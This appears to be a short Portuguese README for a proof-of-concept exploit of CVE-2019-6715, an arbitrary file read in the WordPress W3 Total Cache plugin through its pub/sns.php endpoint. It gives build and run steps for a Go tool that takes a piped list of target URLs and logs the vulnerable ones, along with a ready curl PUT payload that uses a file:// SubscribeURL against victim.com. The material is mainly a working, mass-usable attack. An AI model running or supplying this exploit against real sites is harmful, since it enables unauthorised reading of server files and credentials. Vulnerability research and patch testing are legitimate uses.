
Exploração de PoC para CVE-2019-6715: leitura arbitrária de arquivos no plugin W3 Total Cache do WordPress através de JSON SubscriptionConfirmation manipulado. Lê arquivos de servidores vulneráveis usando uma lista de URLs via pipe.
go get github.com/fatih/color
go build
cat list.txt | ./2019-6715
Todas as URLs vulneráveis são registradas em text.log
Descrição: O pub/sns.php no plugin W3 Total Cache anterior à versão 0.9.4 para WordPress permite que atacantes remotos leiam arquivos arbitrários através do campo SubscribeURL nos dados JSON de SubscriptionConfirmation.
Tipo de Vulnerabilidade: leitura arbitrária de arquivos
Fornecedor do Produto: plugin Wordpress W3 Total Cache por Frederick Townes
Base de Código do Produto Afetado: W3 Total Cache - 0.9.2.6 - 0.9.3, corrigido na versão 0.9.4
Componente Afetado: Arquivo de código fonte afetado: w3-total-cache/pub/sns.php
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php